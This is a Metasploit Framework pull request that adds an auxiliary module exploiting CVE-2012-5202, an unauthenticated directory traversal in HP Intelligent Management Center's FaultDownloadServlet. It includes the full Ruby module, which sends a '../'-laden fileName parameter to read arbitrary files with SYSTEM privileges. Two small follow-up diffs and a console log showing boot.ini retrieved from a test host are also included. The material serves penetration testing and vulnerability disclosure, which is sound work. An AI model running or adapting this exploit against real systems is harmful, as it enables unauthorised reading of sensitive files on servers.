### PR TITLE
added module for ZDI-13-051

### DIFF
--- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
@@ -1,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'HP Intelligent Management FaultDownloadServlet Directory Traversal',
+			'Description'    => %q{
+					This module exploits a lack of authentication and a directory traversal in HP
+				Intelligent Management, specifically in the FaultDownloadServlet, in order to
+				retrieve arbitrary files with SYSTEM privileges. This module has been tested
+				successfully on HP Intelligent Management  Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-5202' ],
+					[ 'OSVDB', '91027' ],
+					[ 'BID', '58675' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-051/' ]
+				]
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
+				# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
+				OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
+			], self.class)
+	end
+
+	def is_imc?
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return true
+		else
+			return false
+		end
+	end
+
+	def run_host(ip)
+
+		if not is_imc?
+			vprint_error("#{rhost}:#{rport} - This isn't a HP Intelligent Management Center")
+			return
+		end
+
+		travs = ""
+		travs << "../" * datastore['DEPTH']
+		travs << datastore['FILEPATH']
+
+		vprint_status("#{rhost}:#{rport} - Sending request...")
+		res = send_request_cgi({
+			'uri'          => normalize_uri(target_uri.path.to_s, "tmp", "fault", "download"),
+			'method'       => 'GET',
+			'vars_get'     =>
+				{
+					'fileName' => travs
+				}
+		})
+
+		if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
+			contents = res.body
+			fname = File.basename(datastore['FILEPATH'])
+			path = store_loot(
+				'hp.imc.faultdownloadservlet',
+				'application/octet-stream',
+				ip,
+				contents,
+				fname
+			)
+			print_good("#{rhost}:#{rport} - File saved in: #{path}")
+		else
+			vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+			return
+		end
+	end
+end

--- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
 				OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
 				# By default files downloaded from C:\Program Files\iMC\client\web\apps\imc\tmp\
-				OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 7])
+				OptInt.new('DEPTH', [true, 'Traversal depth', 7])
 			], self.class)
 	end
 
@@ -58,6 +58,10 @@ class Metasploit3 < Msf::Auxiliary
 		else
 			return false
 		end
+	end
+
+	def my_basename(filename)
+		return ::File.basename(filename.gsub(/\\/, "/"))
 	end
 
 	def run_host(ip)
@@ -83,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] == "application/doc"
 			contents = res.body
-			fname = File.basename(datastore['FILEPATH'])
+			fname = my_basename(datastore['FILEPATH'])
 			path = store_loot(
 				'hp.imc.faultdownloadservlet',
 				'application/octet-stream',

--- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
 					This module exploits a lack of authentication and a directory traversal in HP
 				Intelligent Management, specifically in the FaultDownloadServlet, in order to
 				retrieve arbitrary files with SYSTEM privileges. This module has been tested
-				successfully on HP Intelligent Management  Center 5.1 E0202 over Windows 2003 SP2.
+				successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>


### PR DESCRIPTION
- Tested successfully on HP Intelligent Management  Center 5.1 E0202 over Windows 2003 SP2

```
msf auxiliary(hp_imc_faultdownloadservlet_traversal) > info

       Name: HP Intelligent Management FaultDownloadServlet Directory Traversal
     Module: auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal
    Version: 0
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  rgod <rgod@autistici.org>
  juan vazquez <juan.vazquez@metasploit.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      7                yes       Traversal depth if absolute is set to false
  FILEPATH   /boot.ini        yes       The name of the file to download
  Proxies                     no        Use a proxy chain
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port
  TARGETURI  /imc             yes       Path to HP Intelligent Management Center
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a lack of authentication and a directory 
  traversal in HP Intelligent Management, specifically in the 
  FaultDownloadServlet, in order to retrieve arbitrary files with 
  SYSTEM privileges. This module has been tested successfully on HP 
  Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.

References:
  http://cvedetails.com/cve/2012-5202/
  http://www.osvdb.org/91027
  http://www.securityfocus.com/bid/58675
  http://www.zerodayinitiative.com/advisories/ZDI-13-051/

msf auxiliary(hp_imc_faultdownloadservlet_traversal) > set rhosts 192.168.1.140
rhosts => 192.168.1.140
msf auxiliary(hp_imc_faultdownloadservlet_traversal) > run

[+] 192.168.1.140:8080 - File saved in: /Users/juan/.msf4/loot/20130403001946_default_192.168.1.140_hp.imc.faultdown_582284.ini
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(hp_imc_faultdownloadservlet_traversal) > cat /Users/juan/.msf4/loot/20130403001946_default_192.168.1.140_hp.imc.faultdown_582284.ini
[*] exec: cat /Users/juan/.msf4/loot/20130403001946_default_192.168.1.140_hp.imc.faultdown_582284.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect

```
